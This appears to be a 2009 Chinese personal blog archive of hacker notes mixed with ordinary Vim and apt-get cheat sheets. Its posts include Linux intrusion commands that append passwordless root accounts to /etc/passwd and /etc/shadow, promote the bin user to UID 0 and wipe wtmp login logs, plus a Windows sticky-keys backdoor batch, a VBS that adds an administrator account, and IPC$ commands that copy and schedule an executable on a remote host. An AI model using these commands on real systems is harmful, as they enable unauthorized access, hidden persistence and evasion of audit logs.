# /usr/sbin/setsebool httpd_can_network_connect 1 OR # /usr/sbin/setsebool httpd_can_network_connect true
2009年10月18日
Linux服务器程序访问网络设置
2009年8月31日
2009年8月20日
MY动力(MyPower)3.51注入漏洞手动利用
2009年8月12日
[转载]linux入侵常用命令
cat /etc/shadow 查看用户密码需要root权限
cat /etc/sysconfig/network-scripts/ifcfg-ethn N代表网卡号 查看所在网卡的ip信息
ifconfig 查看本机ip信息
cat /etc/resolv.conf 查看DNS信息
bash -i 在反弹的shell中使用可以直观显示命令
bash prompt: 当你以普通限权用户身份进入的时候,一般你会有一个类似bash$的prompt。当你以Root登陆时,你的prompt会变成
bash#。
系统变量 : 试着echo "$USER / $EUID" 系统应该会告诉你它认为你是什么用户。
echo 1>/proc/sys/net/ipv4/if_forward是不是你写错了,应该是echo 1>/proc/sys/net/ipv4/ip_forward,
vim /proc/sys/net/ipv4/ip_forward 吧,默认是0,也就是内核不进行数据包过滤,改为1 ,让内核对数据包进行filter处理!
netstat -an |grep LISTEN |grep :80 查看端口
service --status-all | grep running
service --status-all | grep http
查看运行服务
lsb_release -a 查看系统版本
重启ssh服务 :/usr/sbin/sshd stop
/usr/sbin/sshd start
ssd_config文件里
PasswordAuthentication no,
将其改为
PasswordAuthentication yes
远程ssh才可登录
否则显示Access denied
其中Usepam yes可能用来建立pam方式login,比如从其它linux主机ssh到服务端,如果关闭,则不能打开.
su的菜鸟用法
先chomod 777 /etc/passwd
然后修改bin用户的gid和uid为0
然后passwd设置bin的密码
然后cp /bin/bash /sbin/nologin
然后su的时候su - bin就可以到rootshell了。
这个原理就是当ssh不允许root用ssh终端登陆的时候,我们又不知道root密码,的一种很菜鸟的做法
还可以这样
sed -i s/bin:x:1:1/bin:x:0:1/g /etc/passwd
gcc prtcl2.c –o local –static –Wall
echo "nosec:x:0:0::/:/bin/sh" >> /etc/passwd
echo "nosec::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow
清空last记录 cp /dev/null /var/log/wtmp
-----
dd if=/dev/zero of=yourfile bs=10M count=10 建立一个100m的大文件在利用Linux Kernel <= 2.6.17.4 (proc) Local Root Exploit提权的时候要用到的
2009年8月3日
2009年7月29日
取消windows 2003 关机原因的提示
1.进入组策略(Gpedit.msc) 2.右击"管理模板"' 3.选择"添加删除模板" 4.点击"添加"按钮 5.Ctrl+A全选模板 6.确定
2009年7月24日
2009年7月23日
AIX查看硬件配置
| AIX查看硬件配置 | |
|
2009年7月22日
2009年7月11日
SQL Tools上传文件原理
2009年7月8日
常见Windows键盘按键虚拟码
键盘常用ASCII码 |
2009年6月3日
2009年6月2日
Symantec杀毒日志路径
2009年5月18日
Fckeditor上传webshell
2009年5月14日
注册表获取Windows自动登陆用户名密码
Defaultpassword=密码
2009年5月12日
2009年5月9日
Windows Server 2003 R2 with SP2 英文版合集(8IN1)
2009年4月28日
Windows一些常用命令&程序
有些感觉还是挺有用,先留着。
汇编代码中构造字符串之顺序问题
主要是构造字符串时顺序问题很烦人,贴两个例子上来,方便以后用到的时候查询。
以构造字符串"ABCD1234零魂"为例
PUSH EBP
MOV EBP,ESP
SUB ESP,0AH
MOV DWORD PTR [EBP-10H],0x44434241 //0x DCBA
MOV DWORD PTR [EBP-0CH],0x34333231 //0x 4321
MOV DWORD PTR [EBP-08H],0xEABBE3C1 //0x 反序0xC1E3BBEA就是"零魂"
MOV DWORD PTR [EBP-04H],0x0 //字符串结束
LEA EAX,[EBP-10H] //EAX=ADDR OF "ABCD1234零魂"
PUSH EBP
MOV EBP,ESP
PUSH 0xEABBE3C1//0x 反序0xC1E3BBEA就是"零魂"
PUSH 0x34333231//0x 4321
PUSH 0x44434241//0x DCBA
MOV EAX,ESP //EAX=ADDR OF "ABCD1234零魂"
2009年4月26日
2009年4月22日
MSSQL SA用sp_makewebtask写一句话
暂时还未测试..
2009年4月16日
2009年4月15日
无net.exe添加账户的VBS
//user:zerosoul
//pass:12345678
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","zerosoul")
od.SetPassword "12345678"
od.SetInfo
Set of=GetObject(os&"/zerosoul",user)
oe.add os&"/zerosoul"
2009年4月13日
Cmd粘滞键后门批处理
del /q /f %systemroot%\system32\dllcache\sethc.exe
del /q /f %systemroot%\system32\sethc.exe
copy /y %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe
copy /y %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe
2009年4月8日
2009年4月3日
2003不重启命令行开3389
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f
2009年3月31日
MS SQL Server注入语句
2009年3月28日
关于HTTP头和访客IP
HTTP_X_FORWARDED_FOR:33.33.33.33
HTTP_REMOTE_ADDR:127.0.0.1
2009年3月26日
Linux 一些配置文件的位置
/etc/sudoers
apt-get 命令参数详解
2009年3月25日
一些Linux命令
终端下查找文件命令
(假如从根目录/开始查找bash文件的话。)
Ctrl+Alt+BackSpace sudo /etc/init.d/gdm force-reload sudo /etc/init.d/kdm force-reload 结束进程 先ps -A | grep nc查看进程PID,以nc为例,假如结果是1394 然后kill 1394(nc进程的PID) 或者killall nc,结束所有nc进程 user权限查看IP /sbin/ifconfig 因为/sbin目录下的所有程序只给了root用户环境变量 |
升极核心:apt-get install kernel-image-2.6.7-1-686
安装中文支持:apt-get install locales
安装主题:apt-get install gdm-themes
中文字库:apt-get install xfonts-intl-chinese
fcitx输入:apt-get install fcitx
安装浏览器:apt-get insatll mozilla-firefox flashplugin nonfree
调整分辨率:xrandr gtf 1024*768 100
中文支持:apt-get install zhcon
x-window:apt-get install x-window-system-core
apt-get install gnome-core
基础设定:base-congfige
查看分区:fdisk -L /dev/hda(sda)
装载ntfs分区:mount -t NTFS /dev/sda6 /mnt/2003
目录打包:tar -cvf 包名 目录
tar -zcvf 压缩打包
查看系统启动时运行的程序: #rcconf
查看cpu信息: more /proc/cppuinfo
配置中文: dpkg -reconfigure locales
安装中文字体和扶持 :
apt-get install ttf-arphic-bkaioompttf-arphic-bsmioolp xfonts -instl-chinese xcin
装载fat分区: mount -t vfat /dev/hda10 music
设置proxy,router ,dns
/etc/network/interfaces
/etc/resolv.conf
2009年3月24日
VIM常用命令列表
转自:http://blog.csdn.net/AbnerChai/
移动光标
上:k nk:向上移动n行 9999k或gg可以移到第一行 G移到最后一行
下:j nj:向下移动n行
左:h nh:向左移动n列
右:l nl:向右移动n列
w:光标以单词向前移动 nw:光标向前移动n个单词 光标到单词的第一个字母上
b:与w相反
e: 光标以单词向前移动 ne:光标向前移动n个单词 光标到单词的最后一个字母上
ge:与e相反
$:移动光标到行尾 n$:移动到第n行的行尾
0(Num):移动光标到行首
^:移动光标到行首第一个非空字符上去
f:移动光标到当前行的字符a上,nf移动光标到当前行的第n个a字符上
F:相反
%:移动到与制匹配的括号上去(),{},[],<>等。
nG:移动到第n行上 G:到最后一行
CTRL+G 得到当前光标在文件中的位置
翻页:
向前翻页:CTRL+F
向下移动半屏:CTRL+G
向后翻页:CTRL+B
存盘:
:q! :不存盘退出
:e! :放弃修改文件内容,重新载入该文件编辑
:wq :存盘退出
删除:
dw:删除一个单词,需将光标移到单词的第一个字母上,按dw,如果光标在单词任意位置,用daw
dnw:删除n个单词
dne:也可,只是删除到单词尾
dnl:向右删除n个字母
dnh:向左删除n个字母
dnj:向下删除n行
dnk:向上删除n行
d$:删除当前光标到改行的行尾的字母
dd:删除一行
cnw[word]:将n个word改变为word
cc:改变整行
C$:改变到行尾
J: 删除换行符,将光标移到改行,按shift+j删除行尾的换行符,下一行接上来了.
撤销:
u: 撤销前一次的操作
shif+u(U):撤销对该行的所有操作。
:set showmode :设置显示工作模式
o:在当前行的下面另起一行
O(shift+o):在当前行的上面另起一行
nk或nj:光标向上或向下移n行,n为数字
an!【ESC】:在行后面加n个感叹号(!)
nx:执行n次x(删除)操作
ZZ:保存当前文档并退出VIM
:help :查看帮助文档,在这之中,按CTRL+] 进入超连接,按CTRL+O 返回。
:help subject :看某一主题的帮助,ZZ 退出帮助
:set number / set nonumber :显示/不显示行号
:set ruler /set noruler:显示/不显示标尺
/pattern 正方向搜索一个字符模式
?pattern 反方向搜索一个字符模式
然后按n 继续向下找
把光标放到某个单词上面,然后按×号键,表示查找这个单词
查找整个单词:/\
:set hlsearch 高亮显示查找到的单词
:set nohlsearch 关闭改功能
m[a-z]:在文中做标记,标记号可为a-z的26个字母,用`a可以移动到标记a处
查找替换:
way1:
/【word】 :查找某个word
cw【newword】:替换为新word
n: 继续查找
.: 执行替换
r:替换当前字符
nr字符:替换当前n个字符
way2:
:s/string1/string2/g:在一行中将string1替换为string2,g表示执行 用c表示需要确认
:num1,num2 s/string1/string2/g:在行num1至num2中间将string1替换为string2
:1,$ s/string1/string2/g:在全文中将string1替换为string2
v:进入visual 模式
【ESC】退出
V:shift+v 进入行的visual 模式
CTRL+V:进如块操作模式用o和O改变选择的边的大小。
粘贴:
p,这是粘贴用x或d删除的文本
复制:
ynw:复制n个单词
yy:复制一行
ynl:复制n个字符
y$:复制当前光标至行尾处
nyy:拷贝n行
完了用p粘贴
:split:分割一个窗口
:split file.c :为另一个文件file.c分隔窗口
:nsplit file.c: 为另一个文件file.c分隔窗口,并指定其行数
CTRL+W在窗口中切换
:close:关闭当前窗口
在所有行插入相同的内容如include,操作方法如下: 将光标移到开始插入的位置,按CTRL+V进入VISUAL模式,选择好模块后 按I(shift+i),后插入要插入的文本,按[ESC]完成。
:read file.c 将文件file.c的内容插入到当前光标所在的下面
:0read file.c 将文件file.c的内容插入到当前文件的开始处(第0行)
:nread file.c 将文件file.c的内容插入到当前文件的第n行后面
:read !cmd :将外部命令cmd的输出插如到当前光标所在的下面
:n1,n2 write temp.c 将本文件中的n1,到n2行写入temp.c这个文件中去
CTRL+L刷新屏幕
shift + < 左移一行 shift + > 右移一行
u: undo
CTRL+R: re-do
J: 合并一行
CTRL+p 自动完成功能
CTRL+g 查看当前文件全路径
q[a-z] 开始记录但前开始的操作为宏,名称可为【a-z】,然后用q终止录制宏。
用reg显示当前定义的所有的宏,用@[a-z]来在当前光标处执行宏[a-z].
经典IPC$入侵命令
copy mm.exe \\192.168.0.1\c$
net time \\192.168.0.1
at \\192.168.0.1 11:05 c:\mm.exe
(假如net time 返回的是 11:04)
net time \\192.168.0.1
